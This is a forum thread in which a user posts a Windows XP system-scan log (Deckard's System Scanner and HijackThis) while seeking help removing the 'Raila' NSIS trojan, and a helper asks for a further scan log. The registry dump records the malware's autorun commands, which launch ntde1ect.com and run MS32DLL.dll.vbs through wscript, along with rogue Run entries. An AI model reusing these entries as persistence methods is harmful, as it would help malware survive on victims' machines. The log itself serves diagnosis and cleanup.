O8 - Extra context menu item: Convert selected links to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
O8 - Extra context menu item: Convert selected links to existing PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
O8 - Extra context menu item: Convert selection to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert selection to existing PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: Convert to existing PDF - res://C:\Program Files\Adobe\Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O17 - HKLM\System\CCS\Services\Tcpip\..\{1A62DFC3-A742-4EB8-8970-82A7B23D3E65}: NameServer = 196.46.100.2 196.46.104.2
O17 - HKLM\System\CS1\Services\Tcpip\..\{1A62DFC3-A742-4EB8-8970-82A7B23D3E65}: NameServer = 196.46.100.2 196.46.104.2
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: BOCore - COMODO - C:\Program Files\Comodo\CBOClean\BOCORE.exe
O23 - Service: Comodo Application Agent (CmdAgent) - COMODO - C:\Program Files\Comodo\Firewall\cmdagent.exe
O23 - Service: InCD Helper (InCDsrv) - Nero AG - C:\Program Files\Nero\Nero 7\InCD\InCDsrv.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
O23 - Service: Lifeview HID Remote Controller Service (lvhidsvc) - Animation Technologies Inc. - C:\WINDOWS\system32\lvhidsvc.exe
O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Common Files\Ahead\Lib\NMIndexingService.exe

--
End of file - 5970 bytes

-- HijackThis Fixed Entries (C:\PROGRA~1\TRENDM~1\HIJACK~1\backups\) -----------

backup-20070929-125231-619 O4 - Startup: K'S TAX INVOICE.lnk = ?
backup-20070929-135250-232 O4 - Startup: scan.lnk = ?
backup-20070929-135250-274 O4 - Startup: K'S TAX INVOICE (KINYEREZI.lnk = ?
backup-20070929-135250-285 O4 - Startup: 2007-09 (Sep).lnk = ?
backup-20070929-135250-287 O4 - Startup: scan0002.lnk = ?
backup-20070929-135250-364 O4 - Startup: K'S TAX INVOICE.lnk = ?
backup-20070929-135250-368 O4 - HKLM\..\Run: [MS32DLL] C:\WINDOWS\MS32DLL.dll.vbs
backup-20070929-135250-460 O4 - Startup: autorun.lnk = ?
backup-20070929-135250-563 O4 - Startup: ldupver.lnk = ?

-- File Associations -----------------------------------------------------------

All associations okay.

-- Drivers: 0-Boot, 1-System, 2-Auto, 3-Demand, 4-Disabled ---------------------

R3 LVCap138 (TV Card WDM Video Capture) - c:\windows\system32\drivers\lvcap138.sys <Not Verified; Animation Technologies Inc.; Lifeview (R) LR138 TV Card>
R3 lvtuner (TV Card TV Tuner) - c:\windows\system32\drivers\lvtuner.sys <Not Verified; Animation Technologies Inc.; Lifeview (R) TV Card>
R3 umpusbxp (VCP Serial Port Driver) - c:\windows\system32\drivers\umpusbxp.sys <Not Verified; Texas Instruments; Texas Instruments UMP Device Driver (TUSB5052, TUSB3410)>

-- Services: 0-Boot, 1-System, 2-Auto, 3-Demand, 4-Disabled --------------------

R2 BOCore - c:\program files\comodo\cboclean\bocore.exe <Not Verified; COMODO; COMODO BOClean - Anti-Malware>
R2 lvhidsvc (Lifeview HID Remote Controller Service) - c:\windows\system32\lvhidsvc.exe <Not Verified; Animation Technologies Inc.; Lifeview (R) TV Card>
R3 NMIndexingService - "c:\program files\common files\ahead\lib\nmindexingservice.exe" <Not Verified; Nero AG; Nero Home>

-- Device Manager: Disabled ----------------------------------------------------

Class GUID: {4D36E972-E325-11CE-BFC1-08002BE10318}
Description: Realtek RTL8139/810x Family Fast Ethernet NIC
Device ID: PCI\VEN_10EC&DEV_8139&SUBSYS_81391849&REV_10\4&2E98101C&0&28F0
Manufacturer: Realtek Semiconductor Corp.
Name: Realtek RTL8139/810x Family Fast Ethernet NIC
PNP Device ID: PCI\VEN_10EC&DEV_8139&SUBSYS_81391849&REV_10\4&2E98101C&0&28F0
Service: RTL8023xp

-- Files created between 2007-08-30 and 2007-09-30 -----------------------------

2007-09-30 08:49:30 0 d-------- C:\WINDOWS\LastGood
2007-09-29 14:04:45 0 d-------- C:\Documents and Settings\Mama\Application Data\Adobe
2007-09-29 14:04:25 0 d-------- C:\Documents and Settings\Mama\Application Data\AVG7
2007-09-29 14:02:30 0 d-------- C:\Documents and Settings\Mama\Application Data\Identities
2007-09-29 14:01:41 0 d---s---- C:\Documents and Settings\Mama\Application Data\Microsoft
2007-09-29 14:01:40 0 d--h----- C:\Documents and Settings\Mama\Templates
2007-09-29 14:01:40 0 dr------- C:\Documents and Settings\Mama\Start Menu
2007-09-29 14:01:40 0 dr-h----- C:\Documents and Settings\Mama\SendTo
2007-09-29 14:01:40 0 dr-h----- C:\Documents and Settings\Mama\Recent
2007-09-29 14:01:40 0 d--h----- C:\Documents and Settings\Mama\PrintHood
2007-09-29 14:01:40 524288 --ah----- C:\Documents and Settings\Mama\NTUSER.DAT
2007-09-29 14:01:40 0 d--h----- C:\Documents and Settings\Mama\NetHood
2007-09-29 14:01:40 0 dr------- C:\Documents and Settings\Mama\My Documents
2007-09-29 14:01:40 0 d--h----- C:\Documents and Settings\Mama\Local Settings
2007-09-29 14:01:40 0 dr------- C:\Documents and Settings\Mama\Favorites
2007-09-29 14:01:40 0 d-------- C:\Documents and Settings\Mama\Desktop
2007-09-29 14:01:40 0 d---s---- C:\Documents and Settings\Mama\Cookies
2007-09-29 14:01:40 0 dr-h----- C:\Documents and Settings\Mama\Application Data
2007-09-29 12:37:20 2226 --a------ C:\WINDOWS\system32\tmp.reg
2007-09-29 12:30:06 0 d-------- C:\spoolerlogs
2007-09-29 12:29:10 0 d-------- C:\Program Files\Trend Micro
2007-09-29 11:58:46 0 d-a------ C:\Documents and Settings\All Users\Application Data\TEMP
2007-09-29 11:58:14 0 d-------- C:\Documents and Settings\Clement\Application Data\PC Tools
2007-09-29 10:37:17 0 dr-h----- C:\$VAULT$.AVG
2007-09-29 10:16:12 0 d-------- C:\Documents and Settings\Clement\Application Data\AVG7
2007-09-29 10:16:01 0 d-------- C:\Documents and Settings\LocalService\Application Data\AVG7
2007-09-29 10:14:47 0 d-------- C:\Documents and Settings\All Users\Application Data\avg7
2007-09-29 08:52:35 0 dr------- C:\Documents and Settings\LocalService\Favorites
2007-09-29 08:45:43 67643 -r-hs---- C:\ntde1ect.com
2007-09-29 08:31:00 13824 -r-hs---- C:\WINDOWS\system32\avpo0.dll
2007-09-29 08:31:00 67643 -r-hs---- C:\WINDOWS\system32\avpo.exe
2007-09-29 08:24:56 0 d-------- C:\Documents and Settings\All Users\Application Data\McAfee.com
2007-09-29 07:50:49 235008 --a------ C:\WINDOWS\UNBOC.EXE <Not Verified; COMODO; COMODO BOClean - Anti-Malware>
2007-09-29 07:50:48 208896 --a------ C:\WINDOWS\CMDLIC.DLL <Not Verified; COMODO; COMODO BOClean - AntiMalware>
2007-09-29 07:50:42 0 d-------- C:\Documents and Settings\All Users\Application Data\BOC425
2007-09-28 06:11:57 0 d-------- C:\WINDOWS\system32\PreInstall
2007-09-28 04:58:02 0 d--h----- C:\WINDOWS\$hf_mig$
2007-09-27 17:29:27 0 d-------- C:\Program Files\SpywareBlaster
2007-09-27 17:27:27 0 d-------- C:\Documents and Settings\Clement\Application Data\Comodo
2007-09-27 17:27:25 0 d-------- C:\Documents and Settings\All Users\Application Data\Comodo
2007-09-27 17:01:07 0 d-------- C:\Program Files\Comodo
2007-09-25 16:49:23 0 d-------- C:\Documents and Settings\Clement\Application Data\AdobeUM
2007-09-24 18:15:04 0 d-------- C:\Documents and Settings\All Users\Application Data\Yahoo!
2007-09-24 18:10:29 0 d-------- C:\Program Files\Yahoo!
2007-09-24 09:09:08 0 d-------- C:\Documents and Settings\Clement\Application Data\Macromedia
2007-09-24 09:08:40 1156 --a------ C:\WINDOWS\mozver.dat
2007-09-23 17:17:40 0 d---s---- C:\Documents and Settings\Clement\UserData
2007-09-23 11:31:46 0 d-------- C:\Documents and Settings\Clement\Application Data\Skype
2007-09-23 11:31:34 0 d-------- C:\Program Files\Skype
2007-09-23 08:58:14 0 d-------- C:\Downloads and Utilities 2007
2007-09-21 06:03:54 0 d-------- C:\Documents and Settings\NetworkService\Start Menu
2007-09-21 06:00:41 0 d-------- C:\WINDOWS\system32\SoftwareDistribution
2007-09-19 20:39:24 0 d--hs---- C:\WINDOWS\Installer
2007-09-19 20:39:22 0 d-------- C:\Program Files\Common Files\ODBC
2007-09-19 20:39:16 0 dr------- C:\Program Files
2007-09-19 20:39:16 0 d-------- C:\Program Files\Common Files
2007-09-19 20:39:16 0 d-------- C:\Program Files\Common Files\SpeechEngines
2007-09-19 20:38:44 0 d--h----- C:\Documents and Settings\Default User\Templates
2007-09-19 20:38:44 0 dr------- C:\Documents and Settings\Default User\Start Menu
2007-09-19 20:38:44 0 dr-h----- C:\Documents and Settings\Default User\SendTo
2007-09-19 20:38:44 0 d--h----- C:\Documents and Settings\Default User\Recent
2007-09-19 20:38:44 0 d--h----- C:\Documents and Settings\Default User\PrintHood
2007-09-19 20:38:44 0 d--h----- C:\Documents and Settings\Default User\NetHood
2007-09-19 20:38:44 0 d-------- C:\Documents and Settings\Default User\My Documents
2007-09-19 20:38:44 0 dr-h----- C:\Documents and Settings\Default User\Local Settings
2007-09-19 20:38:44 0 d-------- C:\Documents and Settings\Default User\Favorites
2007-09-19 20:38:44 0 d-------- C:\Documents and Settings\Default User\Desktop
2007-09-19 20:38:44 0 d---s---- C:\Documents and Settings\Default User\Cookies
2007-09-19 20:38:44 0 d--h----- C:\Documents and Settings\All Users\Templates
2007-09-19 20:38:44 0 dr------- C:\Documents and Settings\All Users\Start Menu
2007-09-19 20:38:44 0 d-------- C:\Documents and Settings\All Users\Favorites
2007-09-19 20:38:44 0 dr------- C:\Documents and Settings\All Users\Documents
2007-09-19 20:38:44 0 d-------- C:\Documents and Settings\All Users\Desktop
2007-09-19 20:36:43 0 d-------- C:\WINDOWS\system32\CatRoot2
2007-09-19 20:36:43 0 d-------- C:\WINDOWS\system32\CatRoot
2007-09-19 20:36:36 0 dr-h----- C:\Documents and Settings\Default User\Application Data
2007-09-19 20:36:36 0 d---s---- C:\Documents and Settings\Default User\Application Data\Microsoft
2007-09-19 20:36:35 0 dr-h----- C:\Documents and Settings\All Users\Application Data
2007-09-19 20:36:35 0 d---s---- C:\Documents and Settings\All Users\Application Data\Microsoft
2007-09-19 20:36:07 0 d-------- C:\Documents and Settings
2007-09-19 20:33:12 0 d--hs---- C:\System Volume Information
2007-09-19 20:19:03 0 d-------- C:\WINDOWS
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\WinSxS
2007-09-19 20:19:03 0 dr------- C:\WINDOWS\Web
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\twain_32
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\wins
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\wbem
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\usmt
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\spool
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\ShellExt
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\Setup
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\ras
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\oobe
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\npp
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\mui
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\inetsrv
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\IME
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\icsxml
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\ias
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\export
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\drivers
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\drivers\etc
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\drivers\disdn
2007-09-19 20:19:03 0 dr-hs--c- C:\WINDOWS\system32\dllcache
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\dhcp
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\config
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\3com_dmi
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\3076
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\2052
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\1054
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\1042
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\1041
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\1037
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\1033
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\1031
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\1028
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system32\1025
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\system
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\security
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\Resources
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\repair
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\Provisioning
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\PeerNet
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\pchealth
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\mui
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\msapps
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\msagent
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\Media
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\java
2007-09-19 20:19:03 0 d--h----- C:\WINDOWS\inf
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\ime
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\Help
2007-09-19 20:19:03 0 dr--s---- C:\WINDOWS\Fonts
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\ehome
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\Driver Cache
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\Debug
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\Cursors
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\Connection Wizard
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\Config
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\AppPatch
2007-09-19 20:19:03 0 d-------- C:\WINDOWS\addins
2007-09-19 19:45:01 0 --a------ C:\WINDOWS\nsreg.dat
2007-09-19 19:44:56 0 d-------- C:\Documents and Settings\Clement\Application Data\Mozilla
2007-09-19 19:42:27 0 d-------- C:\Program Files\Winamp
2007-09-19 19:41:25 0 d-------- C:\Program Files\Mozilla Thunderbird
2007-09-19 19:24:29 76768 -ra------ C:\WINDOWS\system32\drivers\umpusbxp.sys <Not Verified; Texas Instruments; Texas Instruments UMP Device Driver (TUSB5052, TUSB3410)>
2007-09-19 19:24:29 0 d-------- C:\HUAWEI
2007-09-19 19:14:04 14464 -ra------ C:\WINDOWS\system32\drivers\lvtuner.sys <Not Verified; Animation Technologies Inc.; Lifeview (R) TV Card>
2007-09-19 19:13:35 110592 -ra------ C:\WINDOWS\system32\Prop7134.dll <Not Verified; Philips Semiconductors; Philips Prop7134>
2007-09-19 19:13:35 110592 -ra------ C:\WINDOWS\system32\34com.dll <Not Verified; Philips Semiconductors; VampCOM Module>
2007-09-19 19:13:34 73728 -ra------ C:\WINDOWS\system32\34TvCtrl.dll <Not Verified; Philips Semiconductors; 34TvCtrl>
2007-09-19 19:13:34 23552 -ra------ C:\WINDOWS\system32\34ds.dll <Not Verified; Philips Semiconductors; 34ds>
2007-09-19 19:13:34 282624 -ra------ C:\WINDOWS\system32\34dlg2.dll <Not Verified; Philips Semiconductors; dialog3 Dynamic Link Library>
2007-09-19 19:13:34 94208 -ra------ C:\WINDOWS\system32\34dialog.dll <Not Verified; Philips Semiconductors; 34dialog>
2007-09-19 19:13:34 77824 -ra------ C:\WINDOWS\system32\34dd.dll <Not Verified; Philips Semiconductors; 34dd>
2007-09-19 19:13:33 308096 -ra------ C:\WINDOWS\system32\drivers\lvcap138.sys <Not Verified; Animation Technologies Inc.; Lifeview (R) LR138 TV Card>
2007-09-19 19:13:33 8192 -ra------ C:\WINDOWS\system32\34pciurd.dll <Not Verified; Philips Semiconductors; Philips 34PCIurd>
2007-09-19 19:13:33 6144 -ra------ C:\WINDOWS\system32\34i2curd.dll <Not Verified; Philips Semiconductors; Philips 34I2Curd>
2007-09-19 19:13:33 135168 -ra------ C:\WINDOWS\system32\34api.dll <Not Verified; Philips Semiconductors; UM proxy>
2007-09-19 19:11:48 0 d-------- C:\Program Files\TVR
2007-09-19 19:07:58 0 d-------- C:\Documents and Settings\All Users\Application Data\Adobe Systems
2007-09-19 19:07:25 0 d-------- C:\Documents and Settings\Clement\Application Data\Adobe
2007-09-19 19:07:24 0 d-------- C:\Program Files\Common Files\Adobe Systems Shared
2007-09-19 19:03:29 0 d-------- C:\Program Files\Common Files\Adobe
2007-09-19 19:01:19 0 d-------- C:\Documents and Settings\All Users\Application Data\Adobe
2007-09-19 18:56:17 0 d-------- C:\Documents and Settings\All Users\Application Data\LightScribe
2007-09-19 18:55:16 0 d-------- C:\Program Files\CyberLink
2007-09-19 18:41:03 266240 --a------ C:\WINDOWS\CMIUninstall.exe <Not Verified; ; GeneralUninstall Application>
2007-09-19 18:41:03 225280 --a------ C:\WINDOWS\CmiRmRedundDir.exe <Not Verified; ; CmiRmRedundDir Application>
2007-09-19 18:41:02 28672 --a------ C:\WINDOWS\CMIRmDriver.dll
2007-09-19 18:41:02 0 d-------- C:\Program Files\C-Media 3D Audio
2007-09-19 18:40:19 0 d-------- C:\WINDOWS\OPTIONS
2007-09-19 18:40:19 0 d--h----- C:\Program Files\InstallShield Installation Information
2007-09-19 18:40:06 0 d-------- C:\Program Files\Common Files\InstallShield
2007-09-19 18:39:16 0 d-------- C:\WINDOWS\system32\ReinstallBackups
2007-09-19 18:39:11 0 d-------- C:\Program Files\Intel
2007-09-19 18:38:55 5824 --a------ C:\WINDOWS\system32\drivers\ASUSHWIO.SYS
2007-09-19 18:37:35 0 d-------- C:\Program Files\Common Files\LightScribe
2007-09-19 18:29:31 0 d-------- C:\Documents and Settings\Clement\Application Data\Ahead
2007-09-19 18:26:31 0 d-------- C:\Documents and Settings\All Users\Application Data\Nero
2007-09-19 18:26:30 0 d-------- C:\Program Files\Nero
2007-09-19 18:26:30 0 d-------- C:\Program Files\Common Files\Ahead
2007-09-19 18:24:59 0 d-------- C:\WINDOWS\RegisteredPackages
2007-09-19 18:16:42 0 d-------- C:\Program Files\Common Files\L&H
2007-09-19 18:16:06 0 d-------- C:\Program Files\Microsoft.NET
2007-09-19 18:15:35 0 d-------- C:\Program Files\Microsoft ActiveSync
2007-09-19 18:13:41 0 d-------- C:\Program Files\Microsoft Works
2007-09-19 18:12:41 0 d-------- C:\WINDOWS\SHELLNEW
2007-09-19 18:08:57 0 dr-h----- C:\MSOCache
2007-09-19 18:07:08 0 d-------- C:\Documents and Settings\Clement\Application Data\Identities
2007-09-19 18:06:40 0 d--h----- C:\Documents and Settings\Clement\Templates
2007-09-19 18:06:40 0 dr------- C:\Documents and Settings\Clement\Start Menu
2007-09-19 18:06:40 0 dr-h----- C:\Documents and Settings\Clement\SendTo
2007-09-19 18:06:40 0 dr-h----- C:\Documents and Settings\Clement\Recent
2007-09-19 18:06:40 0 d--h----- C:\Documents and Settings\Clement\PrintHood
2007-09-19 18:06:40 1835008 --ah----- C:\Documents and Settings\Clement\NTUSER.DAT
2007-09-19 18:06:40 0 d--h----- C:\Documents and Settings\Clement\NetHood
2007-09-19 18:06:40 0 dr------- C:\Documents and Settings\Clement\My Documents
2007-09-19 18:06:40 0 d--h----- C:\Documents and Settings\Clement\Local Settings
2007-09-19 18:06:40 0 dr------- C:\Documents and Settings\Clement\Favorites
2007-09-19 18:06:40 0 d-------- C:\Documents and Settings\Clement\Desktop
2007-09-19 18:06:40 0 d---s---- C:\Documents and Settings\Clement\Cookies
2007-09-19 18:06:40 0 dr-h----- C:\Documents and Settings\Clement\Application Data
2007-09-19 18:05:20 0 d-------- C:\WINDOWS\SoftwareDistribution
2007-09-19 18:05:14 0 d-------- C:\WINDOWS\Prefetch
2007-09-19 18:05:13 0 d---s---- C:\WINDOWS\system32\Microsoft
2007-09-19 18:05:11 229376 --a------ C:\Documents and Settings\LocalService\NTUSER.DAT
2007-09-19 18:05:11 0 d--h----- C:\Documents and Settings\LocalService\Local Settings
2007-09-19 18:05:11 0 d---s---- C:\Documents and Settings\LocalService\Cookies
2007-09-19 18:05:11 0 d-------- C:\Documents and Settings\LocalService\Application Data
2007-09-19 18:05:11 0 d---s---- C:\Documents and Settings\LocalService\Application Data\Microsoft
2007-09-19 18:04:46 262144 --ah----- C:\Documents and Settings\NetworkService\NTUSER.DAT
2007-09-19 18:04:46 0 d--h----- C:\Documents and Settings\NetworkService\Local Settings
2007-09-19 18:04:46 0 d---s---- C:\Documents and Settings\NetworkService\Cookies
2007-09-19 18:04:46 0 d-------- C:\Documents and Settings\NetworkService\Application Data
2007-09-19 18:04:46 0 d---s---- C:\Documents and Settings\NetworkService\Application Data\Microsoft
2007-09-19 17:58:04 0 d-------- C:\WINDOWS\system32\xircom
2007-09-19 17:58:04 0 d-------- C:\Program Files\microsoft frontpage
2007-09-19 17:57:42 225280 ---h----- C:\Documents and Settings\Default User\NTUSER.DAT
2007-09-19 17:57:24 0 -rahs---- C:\MSDOS.SYS
2007-09-19 17:57:24 0 -rahs---- C:\IO.SYS
2007-09-19 17:57:24 0 --a------ C:\CONFIG.SYS
2007-09-19 17:57:24 0 --a------ C:\AUTOEXEC.BAT
2007-09-19 17:55:22 0 d--hs---- C:\Documents and Settings\All Users\DRM
2007-09-19 17:54:56 0 dr------- C:\WINDOWS\Offline Web Pages
2007-09-19 17:54:56 0 d---s---- C:\WINDOWS\Downloaded Program Files
2007-09-19 17:54:35 0 d--h----- C:\Program Files\WindowsUpdate
2007-09-19 17:54:04 0 d-------- C:\WINDOWS\system32\DirectX
2007-09-19 17:53:35 0 d---s---- C:\WINDOWS\Tasks
2007-09-19 17:53:34 0 d-------- C:\Program Files\Common Files\MSSoap
2007-09-19 17:53:30 0 d-------- C:\WINDOWS\system32\Macromed
2007-09-19 17:53:30 0 d-------- C:\WINDOWS\srchasst
2007-09-19 17:53:23 0 d-------- C:\Program Files\Movie Maker
2007-09-19 17:53:15 0 d-------- C:\WINDOWS\system32\Restore
2007-09-19 17:52:24 21640 --a------ C:\WINDOWS\system32\emptyregdb.dat
2007-09-19 17:51:57 0 d-------- C:\WINDOWS\Registration
2007-09-19 17:51:43 0 d-------- C:\Program Files\Online Services
2007-09-19 17:51:34 0 d-------- C:\Program Files\Messenger
2007-09-19 17:51:30 0 d-------- C:\Program Files\MSN Gaming Zone
2007-09-19 17:50:52 0 d-------- C:\Program Files\Windows NT
2007-09-19 17:50:49 0 d-------- C:\WINDOWS\system32\MsDtc
2007-09-19 17:50:47 0 d-------- C:\WINDOWS\system32\Com

-- Find3M Report ---------------------------------------------------------------

2007-09-20 08:18:44 24728 --a------ C:\Documents and Settings\Clement\Application Data\Comma Separated Values (Windows).ADR
2007-09-19 20:38:44 62 --ahs---- C:\Documents and Settings\Clement\Application Data\desktop.ini

-- Registry Dump ---------------------------------------------------------------

*Note* empty entries & legit default entries are not shown

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NeroFilterCheck "= "C:\Program Files\Common Files\Ahead\Lib\NeroCheck.exe" [01/12/2006 03:40 PM]
"InCD "= "C:\Program Files\Nero\Nero 7\InCD\InCD.exe" [11/10/2006 04:19 PM]
"igfxtray "= "C:\WINDOWS\system32\igfxtray.exe" [09/20/2005 05:35 AM]
"igfxhkcmd "= "C:\WINDOWS\system32\hkcmd.exe" [09/20/2005 05:32 AM]
"igfxpers "= "C:\WINDOWS\system32\igfxpers.exe" [09/20/2005 05:36 AM]
"RemoteControl "= "C:\Program Files\CyberLink\PowerDVD\PDVDServ.exe" [11/02/2004 08:24 PM]
"Acrobat Assistant 7.0 "= "C:\Program Files\Adobe\Acrobat 7.0\Distillr\Acrotray.exe" [12/14/2004 02:12 AM]
"WinampAgent "= "C:\Program Files\Winamp\winampa.exe" [05/15/2007 01:22 AM]
"BOC-425 "= "C:\PROGRA~1\Comodo\CBOClean\BOC425.exe" [08/08/2007 07:49 PM]

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA} "= "C:\Program Files\Common Files\Ahead\Lib\NMBgMonitor.exe" [12/23/2006 06:05 PM]
"avpa "= "C:\WINDOWS\system32\avpo.exe" [08/28/2007 11:10 AM]
"@ "= "C:\WINDOWS\system32\drivers\scan" []

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\runservices]
"LvHidSvc "=C:\WINDOWS\system32\lvhidsvc.exe

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\C]
AutoRun\command- C:\ntde1ect.com
explore\Command- C:\ntde1ect.com
open\Command- C:\ntde1ect.com

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{0e8f7abd-66d4-11dc-81f0-806d6172696f}]
AutoRun\command- C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL wscript.exe MS32DLL.dll.vbs

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{7a68cf34-6e4c-11dc-bb8a-879a04e4e3e9}]
AutoRun\command- E:\ntde1ect.com
explore\Command- E:\ntde1ect.com
open\Command- E:\ntde1ect.com

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{d9156e3e-6792-11dc-bb76-806d6172696f}]
AutoRun\command- C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL wscript.exe MS32DLL.dll.vbs

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{d9156e3f-6792-11dc-bb76-806d6172696f}]
AutoRun\command- C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL wscript.exe MS32DLL.dll.vbs

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{d9156e40-6792-11dc-bb76-806d6172696f}]
AutoRun\command- C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL wscript.exe MS32DLL.dll.vbs

-- End of Deckard's System Scanner: finished at 2007-09-30 08:56:20 ------------

noahdfear · 2007/09/30

Did you run the Panda ActiveScan as recommended? Have a log?

Log in or Sign up

Raila Virus alias Trojaj.NSIS.Voter.a

Kile Inactive Thread Starter

noahdfear Inactive

Kile Inactive Thread Starter

noahdfear Inactive

Share This Page

Log in or Sign up

Raila Virus alias Trojaj.NSIS.Voter.a

Kile Inactive Thread Starter

noahdfear Inactive

Kile Inactive Thread Starter

noahdfear Inactive

Share This Page

Useful Searches